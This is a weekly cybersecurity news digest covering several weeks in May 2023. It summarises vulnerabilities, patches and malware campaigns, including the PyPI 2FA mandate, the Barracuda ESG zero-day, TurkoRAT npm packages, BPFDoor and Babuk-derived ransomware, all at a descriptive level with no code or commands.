05/25/2023-05/31/2023 PyPI Implements Mandatory Two-Factor Authentication, Critical OAuth Vulnerability, Zyxel Issues Critical Security Patches And More

1. PyPI Implements Mandatory Two-Factor Authentication for Project Owners

The Python Package Index (PyPI) announced that every account that maintains a project on the official third-party software repository will be required to turn on two-factor authentication (2FA) by the end of the year. The enforcement also includes organization maintainers, but does not extend to every single user of the service. The goal is to neutralize the threats posed by account takeover attacks, which an attacker can leverage to distribute trojanized versions of popular packages to poison the software supply chain and deploy malware on a large scale. PyPI, like other open source repositories such as npm, has witnessed innumerable instances of malware and package impersonation.

2. Critical OAuth Vulnerability in Expo Framework Allows Account Hijacking

A critical security vulnerability in the OAuth implementation of Expo.io has been disclosed. The vulnerability, known as CVE-2023-28131, has a severity rating of 9.6 on the CVSS scoring system. Salt Labs, an API security firm, reported that the flaw exposed services using Expo.io to credential leakage, allowing attackers to hijack accounts and access sensitive data. Exploiting the vulnerability could enable threat actors to carry out unauthorized actions on behalf of compromised users across platforms like Facebook, Google, and Twitter. It’s important to note that successful attacks required Expo.io sites and applications to have configured the AuthSession Proxy setting for single sign-on (SSO) using a third-party provider. The vulnerability could be exploited by tricking users into clicking on a malicious link, distributed through methods such as email, SMS, or dubious websites. Expo.io released a hotfix shortly after responsible disclosure and advised users to migrate from AuthSession API proxies to direct registration of deep link URL schemes with authentication providers to enable SSO. Expo.io clarified that the vulnerability was due to storing an app’s callback URL before user confirmation.

3. Severe Flaw in Google Cloud’s Cloud SQL Service Exposed Confidential Data

A security flaw has been disclosed in Google Cloud Platform’s Cloud SQL service, which could allow unauthorized access to sensitive data. According to Israeli cloud security firm Dig, the vulnerability could enable an attacker to escalate privileges from a basic Cloud SQL user to a sysadmin, gaining access to internal GCP data, customer data, secrets, sensitive files, and passwords. Cloud SQL is a managed solution for creating databases for cloud-based applications using MySQL, PostgreSQL, and SQL Server. The attack chain identified by Dig exploited a security gap in the SQL Server associated with the cloud platform, allowing the attacker to elevate their privileges to an administrator role.
With the elevated permissions, the attacker could exploit another misconfiguration to gain system administrator rights and take full control of the database server. This would provide access to all files on the underlying operating system, enabling the attacker to extract passwords and potentially launch further attacks.
The exposure of internal data, including secrets, URLs, and passwords, poses a significant security incident for cloud providers and their customers, according to Dig researchers Ofir Balassiano and Ofir Shaty.

4. Alert: Hackers Exploit Barracuda Email Security Gateway 0-Day Flaw for 7 Months

Barracuda, an enterprise security firm, revealed that threat actors have been exploiting a recently patched zero-day vulnerability in its Email Security Gateway (ESG) appliances since October 2022. The critical flaw, identified as CVE-2023-2868, allows remote attackers to execute code on vulnerable installations. The vulnerability affects versions 5.1.3.001 through 9.2.0.006. Barracuda released patches on May 20 and May 21 to address the issue.
The attacks, which were active for at least seven months before discovery, involved the use of three malware strains: SALTWATER, SEASPY, and SEASIDE. SALTWATER is a trojanized module capable of uploading or downloading files, executing commands, and proxying malicious traffic. SEASPY is an x64 ELF backdoor with persistence capabilities, activated by a magic packet. SEASIDE is a Lua-based module that establishes reverse shells via SMTP commands.
Mandiant, owned by Google, noted code overlaps between SEASPY and cd00r. The attacks have not been attributed to any known threat actor or group. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) included the vulnerability in its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by June 16, 2023.

5. Zyxel Issues Critical Security Patches for Firewall and VPN Products

Zyxel has released software updates to address two critical buffer overflow vulnerabilities, identified as CVE-2023-33009 and CVE-2023-33010, affecting certain firewall and VPN products. The flaws, rated 9.8 out of 10 on the CVSS scoring system, could allow remote attackers to execute code and cause denial-of-service (DoS) conditions. The impacted devices include ATP, USG FLEX, USG FLEX50(W) / USG20(W)-VPN, VPN, and ZyWALL/USG models.
Security researchers from TRAPA Security and STAR Labs SG discovered and reported the vulnerabilities. This advisory follows Zyxel’s recent fixes for another critical flaw, CVE-2023-28771, which allowed remote code execution on firewall devices. That vulnerability was also credited to TRAPA Security and was exploited by threat actors associated with the Mirai botnet.
It is crucial for Zyxel users to apply the provided software updates promptly to mitigate the risks associated with these security vulnerabilities.

6. GUAC 0.1 Beta: Google’s Breakthrough Framework for Secure Software Supply Chains

Google has introduced GUAC (Graph for Understanding Artifact Composition), a beta version aimed at helping organizations enhance the security of their software supply chains. GUAC is an open-source framework offered as an API, enabling developers to integrate their own tools and policy engines.

It aggregates software security metadata from various sources into a graph database, facilitating the analysis of relationships between software components. By utilizing Software Bill of Materials (SBOM) documents, SLSA attestations, OSV vulnerability feeds, and other data sources, GUAC assists in assessing risk profiles and visualizing artifact relationships. The objective is to address supply chain attacks effectively, generate patch plans, and promptly respond to security incidents. Google provided an example scenario where GUAC certifies a compromised builder and queries for affected artifacts.

05/18/2023-05/24/2023 PyPI Repository Under Attack, NPM Packages for Node.js Hiding Dangerous TurkoRat Malware, Malicious Windows Kernel Drivers And More

1. PyPI Repository Under Attack: User Sign-Ups and Package Uploads Temporarily Halted

The maintainers of Python Package Index (PyPI) have temporarily disabled the ability for users to sign up and upload new packages until further notice. No additional details about the nature of the malware and the threat actors involved in publishing those rogue packages to PyPI were disclosed. The decision to freeze new user and project registrations comes as software registries such as PyPI have proven time and time again to be a popular target for attackers looking to poison the software supply chain and compromise developer environments. Earlier this week, Israeli cybersecurity startup Phylum uncovered an active malware campaign that leverages OpenAI ChatGPT-themed lures to bait developers into downloading a malicious Python module capable of stealing clipboard content in order to hijack cryptocurrency transactions. ReversingLabs, in a similar discovery, identified multiple npm packages named nodejs-encrypt-agent and nodejs-cookie-proxy-agent in the npm repository that drops a trojan called TurkoRat.

2. npm Packages Caught Serving TurkoRAT Binaries That Mimic NodeJS

Researchers have discovered multiple npm packages named after NodeJS libraries that even pack a Windows executable that resembles NodeJS but instead drops a sinister trojan.
These packages, given their stealthiness and a very low detection rate, had been present on npm for over two months prior to their detection by the researchers.
Software security firm ReversingLabs analyzed three npm packages that were present on the npmjs.com registry for over two months. 

Initially appearing legitimate, the package named nodejs-encrypt-agent raised concerns due to discrepancies. Further investigation by ReversingLabs revealed that the package contained a malicious portable executable (PE) file named ‘lib.exe.’ Despite its large size of approximately 100 MB, the file closely resembled a real NodeJS application, making it difficult to detect. The PE file was found to run a customizable infostealer called TurkoRAT, designed to steal sensitive information such as login credentials and crypto wallets, while evading sandbox environments and debuggers. Another package, nodejs-cookie-proxy-agent, disguised the malicious executable as a dependency named axios-proxy. ReversingLabs detected and reported these malicious packages, emphasizing the ongoing risk of unvetted open source packages to software supply chain security.

3. Privacy Sandbox Initiative: Google to Phase Out Third-Party Cookies Starting 2024

Google has announced plans to officially flip the switch on its twice-delayed Privacy Sandbox initiatives as it slowly works its way to deprecate support for third-party cookies in Chrome browser. To that end, the search and advertising giant said it intends to phase out third-party cookies for 1% of Chrome users globally in the first quarter of 2024. This will support developers in conducting real world experiments that assess the readiness and effectiveness of their products without third-party cookies. Prior to rolling this out, Google said it would introduce the ability for third-party developers to simulate the process for a configurable subset of their users (up to 10%) in Q4 2023. Privacy Sandbox is a two-pronged project for the web and Android that aims to limit covert tracking by eliminating the need for third-party cookies and cross-app identifiers and still serving relevant content and ads in a privacy-preserving manner.

4. Malicious Windows Kernel Drivers Used In BlackCat Ransomware Attacks

BlackCat employed signed malicious Windows kernel drivers to evade security software detection during attacks. The driver, an improved version of the ‘POORTRY’ malware, was spotted by Trend Micro and previously identified by Microsoft, Mandiant, Sophos, and SentinelOne in ransomware attacks. POORTRY, a Windows kernel driver, was signed using stolen keys from legitimate accounts in Microsoft’s Windows Hardware Developer Program. While security software is typically protected from termination or tampering, Windows kernel drivers have the highest privileges and can terminate nearly any process. The ransomware actors initially used the Microsoft-signed POORTRY driver, but its high detection rates and revoked code-signing keys prompted them to deploy an updated version. The updated POORTRY kernel driver, signed using a stolen or leaked cross-signing certificate, helps the BlackCat ransomware operation elevate privileges on compromised machines and terminate security-related processes.

5. KeePass Exploit Allows Attackers to Recover Master Passwords from Memory

A proof-of-concept (PoC) has been made available for a security flaw impacting the KeePass password manager that could be exploited to recover a victim’s master password in cleartext under specific circumstances. The issue, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS, and is expected to be patched in version 2.54, which is likely to be released early next month. The vulnerability has to do with how a custom text box field used for entering the master password handles user input. Specifically, it has been found to leave traces of every character the user types in the program memory. This leads to a scenario whereby an attacker could dump the program’s memory and reassemble the password in plaintext with the exception of the first character. Users are advised to update to KeePass 2.54 once it becomes available.

6. Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover

UNC3944, a financially motivated cyber actor also known as Roasted 0ktapus, has been exploiting Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools. This unique attack method evades traditional detection methods in Azure, granting the attacker full administrative access to compromised VMs. UNC3944, which emerged last year, utilizes SIM swapping attacks to breach telecommunications and business process outsourcing companies. Mandiant, owned by Google, discovered UNC3944 using a loader named STONESTOP to install a malicious signed driver called POORTRY. This driver terminates security processes and deletes files as part of a BYOVD attack. The initial access likely involves SMS phishing messages targeting privileged users to obtain their credentials and perform a SIM swap. With elevated access, UNC3944 leverages Azure VM extensions and the serial console to gain administrative control. PowerShell is used to deploy legitimate remote administration tools, demonstrating the use of living-off-the-land techniques to evade detection and advance the attack.

05/11/2023-05/17/2023 11 New Vulnerabilities Expose OT Networks, New Flaw in WordPress Plugin, New Stealthy Variant of Linux Backdoor And More

1. Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks

Several security vulnerabilities in cloud management platforms linked to three industrial cellular router vendors were revealed by Israeli cybersecurity firm OTORIO at the Black Hat Asia 2023 conference. These vulnerabilities could expose operational technology (OT) networks to external attacks, impacting critical infrastructure sectors like substations, water utilities, oil fields, and pipelines. The weaknesses affect the cloud-based management solutions offered by Sierra Wireless, Teltonika Networks, and InHand Networks. Exploiting the vulnerabilities could enable remote code execution, full control over devices and OT networks, exfiltration of sensitive information, and unauthorized access with elevated permissions. The flaws involve weak asset registration mechanisms, security configuration flaws, and issues in external APIs and interfaces. Collaboration with Claroty also led to the discovery of additional vulnerabilities in Teltonika Networks’ RMS and RUT router firmware, allowing arbitrary code execution and command injection.

2. New ‘MichaelKors’ Ransomware-as-a-Service Targeting Linux and VMware ESXi Systems

MichaelKors, a new ransomware-as-a-service (RaaS) operation, has recently emerged, targeting Linux and VMware ESXi systems as of April 2023. Cybersecurity firm CrowdStrike has observed an increasing trend of cybercriminals focusing on ESXi, despite its lack of support for third-party agents or antivirus software. This makes the widely used ESXi hypervisor an appealing target for attackers, a technique known as hypervisor jackpotting. Furthermore, leaked Babuk source code from September 2021 has been utilized by 10 different ransomware families, including Conti and REvil, to develop lockers for VMware ESXi hypervisors. Various e-crime groups such as ALPHV (BlackCat), Black Basta, Defray, and others have also updated their tactics to target ESXi. Attackers exploit compromised credentials, gain elevated privileges, and leverage known vulnerabilities to breach ESXi hypervisors and gain unrestricted access to underlying resources. To mitigate the impact of hypervisor jackpotting, organizations are recommended to avoid direct access to ESXi hosts, enable two-factor authentication, take periodic backups of ESXi datastore volumes, apply security updates, and conduct security posture reviews.

3. XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks

Researchers have uncovered an ongoing phishing campaign, named MEME#4CHAN, that utilizes a unique attack chain to distribute the XWorm malware. The attacks have primarily targeted manufacturing firms and healthcare clinics in Germany. The campaign employs meme-filled PowerShell code and heavily obfuscated XWorm payloads to infect victims. The attackers use reservation-themed lures in phishing emails, tricking recipients into opening malicious documents. Rather than relying on macros, the threat actors exploit the Follina vulnerability to drop an obfuscated PowerShell script. This script bypasses Antimalware Scan Interface (AMSI), disables Microsoft Defender, establishes persistence, and executes the .NET binary containing XWorm. The PowerShell script includes a variable named “$CHOTAbheem,” possibly indicating a Middle Eastern or Indian background of the attackers, although attribution remains unconfirmed. XWorm is a readily available malware with various features for stealing sensitive information from infected systems.

4. New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows

A new variant of a Linux backdoor called BPFDoor has been discovered by cybersecurity firm Deep Instinct. BPFDoor, previously documented by PwC and Elastic Security Labs in May 2022, is associated with a Chinese threat actor known as Red Menshen. The malware is designed to establish persistent remote access to compromised environments, particularly targeting telecom providers in the Middle East and Asia. BPFDoor utilizes Berkeley Packet Filters (BPF) technology for network communications and command execution, enabling threat actors to evade firewalls and filter unnecessary data. The latest variant of BPFDoor demonstrates increased evasiveness by removing hard-coded indicators, incorporating encryption with libtomcrypt, and utilizing a reverse shell for command-and-control communication. It avoids termination by ignoring operating system signals and establishes an encrypted reverse shell session with the C2 server. BPFDoor’s ability to remain undetected for an extended period reflects its sophistication, as cybercriminals increasingly target Linux systems prevalent in enterprise and cloud environments.

5. New Flaw in WordPress Plugin Used by Over a Million Sites Under Active Exploitation

A security vulnerability has been discovered in the Essential Addons for Elementor WordPress plugin, potentially allowing attackers to gain elevated privileges. The flaw, tracked as CVE-2023-32243, was addressed in version 5.7.2 of the plugin. Successful exploitation of the vulnerability could enable an unauthenticated user to reset the password of any user on the affected site. This could result in the compromise of administrator accounts and complete control over the website. The issue has existed since version 5.4.0 of the plugin. The disclosure follows a previous severe flaw found in the same plugin, and it coincides with a wave of attacks targeting WordPress sites with SocGholish malware. The attackers are using compression techniques to conceal the malware and evade detection. Additionally, a malvertising campaign has been identified that tricks visitors to adult websites with fake Windows update ads, leading to the installation of the “Invalid Printer” loader, which can deploy the Aurora information stealer malware.

6. Babuk Source Code Sparks 9 Different Ransomware Strains Targeting VMware ESXi Systems

The leak of the Babuk ransomware code in September 2021 has led to the development of multiple ransomware families targeting VMware ESXi systems. As many as nine different ransomware variants have emerged since late 2022 and early 2023, all based on the leaked Babuk source code. The availability of the source code has allowed cybercriminals with limited expertise to target Linux systems effectively. Among the ransomware strains based on the Babuk code are Cylance, Rorschach (also known as BabLock), and RTM Locker. The analysis by SentinelOne also reveals overlaps between Babuk and other ransomware families like Conti and REvil (also known as REvix), indicating the adoption of Babuk features in their code. Additional ransomware families, such as LOCK4, DATAF, Mario, Play, and Babuk 2023 (also known as XVGV), have also incorporated various elements from the Babuk code. However, there are no significant similarities found between Babuk and ALPHV, Black Basta, Hive, LockBit, ESXiArgs, suggesting a misattribution. SentinelOne also notes that actors may turn to Babuk’s Go-based NAS locker, as Go programming language continues to gain popularity among threat actors. In a separate development, threat actors associated with the Royal ransomware, believed to be former members of Conti, have introduced an ELF variant capable of targeting Linux and ESXi environments, expanding their attack capabilities.

7. Hackers Use Azure Serial Console For Stealthy Access To VMs

A financially motivated cybergang tracked by Mandiant as ‘UNC3944’ is using phishing and SIM swapping attacks to hijack Microsoft Azure admin accounts and gain access to virtual machines.
From there, the attackers abuse the Azure Serial Console to install remote management software for persistence and abuse Azure Extensions for stealthy surveillance.
Mandiant reports that UNC3944 has been active since at least May 2022, and their campaign aims at stealing data from victim organizations using Microsoft’s cloud computing service.
UNC3944 was previously attributed to creating the STONESTOP (loader) and POORTRY (kernel-mode driver) toolkit to terminate security software.
The threat actors utilized stolen Microsoft hardware developer accounts to sign their kernel drivers.